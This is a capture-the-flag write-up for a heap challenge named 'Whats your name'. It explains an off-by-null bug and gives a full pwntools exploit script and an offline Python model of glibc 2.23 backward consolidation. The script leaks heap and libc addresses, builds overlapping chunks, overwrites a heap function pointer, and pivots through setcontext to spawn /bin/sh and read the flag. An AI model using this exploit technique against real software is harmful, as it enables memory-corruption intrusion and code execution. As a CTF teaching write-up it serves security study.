[PWN] Whats your name - xf1les

xp0int Posted on Sep 12 2021

The edit function has an off-by-null. First leak a heap address, then use the off-by-null together with a fake chunk to build an overlapping chunk (backward consolidation on free). Finally leak the libc address from the unsorted bin, overwrite a function pointer stored on the heap, and use setcontext to get a shell and read the flag.

```
#!/usr/bin/env python3
import warnings
from pwn import *
warnings.filterwarnings("ignore", category=BytesWarning)

context(arch="amd64")
context(log_level="debug")

libc = ELF("./libc.so.6")

context.proxy = '127.0.0.1'
p = remote("192.168.40.193", 9999)
# ~ p = process("./name", env={"LD_PRELOAD":"./libc.so.6"})

def add(size):
    p.sendlineafter("5.exit", '1')
    p.sendlineafter(":", str(size))

def edit(idx, ctx):
    p.sendlineafter("5.exit", '2')
    p.sendlineafter(":", str(idx))
    p.sendafter(":", ctx)

def free(idx):
    p.sendlineafter("5.exit", '4')
    p.sendlineafter(":", str(idx))

def show(idx):
    p.sendlineafter("5.exit\n", '3')
    p.sendlineafter(":", str(idx))

add(0xf8)   # chunk 0
add(0xf8)   # chunk 1
add(0xf8)   # chunk 2
add(0xf8)   # chunk 3
add(0x60)   # chunk 4

## Leak heapbase
show(4)
p.recvline()
HEAP = u64(p.recv(6).ljust(8, b'\x00')) - 0x790
success("heapbase: 0x%lx", HEAP)

## [BUG] off-by-null
## A full-length write into chunk #1 puts the terminating NUL on the low byte of chunk #2's
## size field: this clears its prev_inuse bit, and the last 8 bytes of the write set its
## prev_size to 0xc60 (the distance back to the fake chunk in chunk #4).
edit(1, b'A'*0xf0 + p64(0xc60))

## Construct the fake chunk header in chunk #4's data:
## prev_size = 0, size = 0xc60, fd = bk = HEAP+0xe0 (so that fd->bk == bk->fd == this chunk,
## satisfying the unlink check), fd_nextsize = bk_nextsize = 0.
edit(4, p64(0) + p64(0xc60) + p64(HEAP+0xe0)*2 + p64(0)*2)

## Free chunk #2: it consolidates backward into the fake chunk, giving one large free
## chunk that overlaps the in-use chunks. Carve two chunks out of it.
free(2)
add(0x100)  # chunk 5
add(0x100)  # chunk 6

## Leak libcbase from the unsorted bin pointer left in chunk 5
show(5)
p.recvline()
libc.address = u64(p.recv(6).ljust(8, b'\x00')) - 0x3c4b78
success("libcbase: 0x%lx", libc.address)

## user_context: syscall(SYS_execveat, 0, "/bin/sh", 0, 0, 0)
## rip = syscall(), so rdi carries the syscall number and the arguments shift by one.
ctx = SigreturnFrame()
ctx.rip = libc.symbols["syscall"]
ctx.rsp = HEAP+0x100  # any RW-able address is OK.
ctx.rdi = 322         # SYS_execveat
ctx.rsi = 0           # dirfd
ctx.rdx = next(libc.search(b'/bin/sh'))  # pathname
ctx.rcx = 0           # argv
ctx.r8 = 0            # envp
ctx.r9 = 0            # flags
edit(5, bytes(ctx))

## Corrupt the function pointer on the heap through the overlapping chunk, so the call
## becomes setcontext+53 with rdi pointing at the user_context data.
## HEAP+0x200 is the address where the user_context data (chunk 5) is stored.
edit(2, b'A'*0x60 + p64(libc.symbols["setcontext"]+53) + p64(HEAP+0x200))
show(2)

## read flag using bash builtin commands
p.sendline("exec 3<flag; read flag <&3; echo $flag")
p.interactive()
```
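To make the off-by-null step above checkable offline, here is an added example (not the writeup's code) that models the glibc 2.23 backward-consolidation path that the exploit relies on: a bytearray heap with real chunk headers, the challenge-style edit that NUL-terminates one byte past the buffer, and an `unlink()` that applies only the `FD->bk == P && BK->fd == P` check of glibc 2.23 (the `chunksize(P) == prev_size(next_chunk(P))` check only arrives in 2.26). The heap base, the pointer table and the three 0x100 chunks are constructed here and do not match the writeup's chunk numbering or its 0xc60 distance; the point is the same, the freed chunk walks back over `prev_size` to a fake chunk and the merged free chunk overlaps the chunk in between.

```python
import struct

# Constants of a 64-bit glibc 2.23-style heap (the writeup's target libc).
SIZE_SZ = 8
PREV_INUSE = 1
MIN_CHUNK = 0x20
SMALLBIN_MAX = 0x3f0   # above this, unlink() also looks at fd_nextsize (kept 0, as in the writeup)

def p64(v): return struct.pack("<Q", v & 0xffffffffffffffff)
def u64(b): return struct.unpack("<Q", b)[0]

class Heap:
    """A bytearray standing in for the heap; addresses are base + offset (base is made up)."""
    def __init__(self, base=0x555555559000, size=0x2000):
        self.base, self.mem, self.brk = base, bytearray(size), base
        self.wr64(base + SIZE_SZ, size | PREV_INUSE)      # initial top chunk header

    def _off(self, addr, n=8):
        o = addr - self.base
        if o < 0 or o + n > len(self.mem):
            raise MemoryError("SIGSEGV: 0x%x is outside the modelled heap" % addr)
        return o

    def rd64(self, addr): o = self._off(addr); return u64(self.mem[o:o + 8])
    def wr64(self, addr, v): o = self._off(addr); self.mem[o:o + 8] = p64(v)
    def write(self, addr, data): o = self._off(addr, len(data)); self.mem[o:o + len(data)] = data

    def malloc(self, req):
        """Bump allocation from top with real chunk headers; enough for the free() path below."""
        size = max(MIN_CHUNK, (req + SIZE_SZ + 15) & ~15)
        chunk = self.brk
        top_size = self.rd64(chunk + SIZE_SZ) & ~0xf
        self.wr64(chunk + SIZE_SZ, size | PREV_INUSE)
        self.brk = chunk + size
        self.wr64(self.brk + SIZE_SZ, (top_size - size) | PREV_INUSE)   # shrunken top chunk
        return chunk + 2 * SIZE_SZ                                       # user pointer

    def unlink(self, P):
        """glibc 2.23 unlink(): the only guard is FD->bk == P && BK->fd == P."""
        FD, BK = self.rd64(P + 0x10), self.rd64(P + 0x18)
        if self.rd64(FD + 0x18) != P or self.rd64(BK + 0x10) != P:
            raise MemoryError("corrupted double-linked list")
        self.wr64(FD + 0x18, BK)          # these two writes are the classic unlink side effect
        self.wr64(BK + 0x10, FD)
        if (self.rd64(P + SIZE_SZ) & ~0xf) > SMALLBIN_MAX and self.rd64(P + 0x20) != 0:
            raise MemoryError("large-bin fd_nextsize path not modelled: keep fd_nextsize == 0")

    def free(self, ptr):
        """_int_free reduced to the backward-consolidation step for a non-fastbin chunk."""
        p = ptr - 2 * SIZE_SZ
        size = self.rd64(p + SIZE_SZ) & ~0xf
        nextsize = self.rd64(p + size + SIZE_SZ) & ~0xf
        if nextsize <= 2 * SIZE_SZ or nextsize >= len(self.mem):
            raise MemoryError("free(): invalid next size (normal)")
        if not (self.rd64(p + SIZE_SZ) & PREV_INUSE):   # prev_inuse cleared by the off-by-null
            prevsize = self.rd64(p)                      # attacker-controlled prev_size field
            p -= prevsize                                # walks back to the fake chunk
            self.unlink(p)
            size += prevsize
        self.wr64(p + SIZE_SZ, size | PREV_INUSE)        # set_head / set_foot of the merged chunk
        self.wr64(p + size, size)
        return p, size

def buggy_edit(heap, ptr, data):
    """The challenge-style edit(): copy the data, then NUL-terminate one byte past it. With a
    full-length write the terminator lands on the low byte of the next chunk's size field."""
    heap.write(ptr, data + b"\x00")

def overlap_via_off_by_null(valid_fd_bk=True):
    heap = Heap()
    tbl = heap.malloc(0x28)                          # stands in for the program's pointer table
    a, b, c = [heap.malloc(0xf8) for _ in range(3)]  # three 0x100 chunks, like the writeup's
    for i, ptr in enumerate((a, b, c)):
        heap.wr64(tbl + 8 * i, ptr)
    fake_size = (c - 0x10) - a                       # from the fake chunk (at a) to chunk C's header
    if valid_fd_bk:
        fd, bk = tbl - 0x18, tbl - 0x10              # FD->bk and BK->fd both read *tbl == a
    else:
        fd, bk = tbl, tbl                            # readable, but *(tbl+0x18) != a
    # Fake chunk header in A's data: prev_size, size, fd, bk, fd_nextsize, bk_nextsize.
    buggy_edit(heap, a, p64(0) + p64(fake_size) + p64(fd) + p64(bk) + p64(0) * 2)
    # Off-by-null from B: C.prev_size = fake_size, C.size 0x101 -> 0x100 (prev_inuse cleared).
    buggy_edit(heap, b, b"A" * 0xf0 + p64(fake_size))
    merged, size = heap.free(c)
    return {"a": a, "b": b, "c": c, "merged": merged, "size": size, "slot0": heap.rd64(tbl)}

if __name__ == "__main__":
    r = overlap_via_off_by_null()
    print("merged free chunk 0x%x..0x%x covers B's chunk at 0x%x"
          % (r["merged"], r["merged"] + r["size"], r["b"] - 0x10))
```

Two details carry over to the real exploit: the fake chunk's `fd`/`bk` must point 0x18 and 0x10 bytes before a memory word that holds the fake chunk's own address (in the writeup that word is the program's pointer table near `HEAP+0xe0`), and the unlink write-back then clobbers that table slot, which is why the writeup allocates fresh chunks from the overlapping region rather than reusing the old index. With `valid_fd_bk=False` the model raises `corrupted double-linked list`, the abort you see when the table slot does not match.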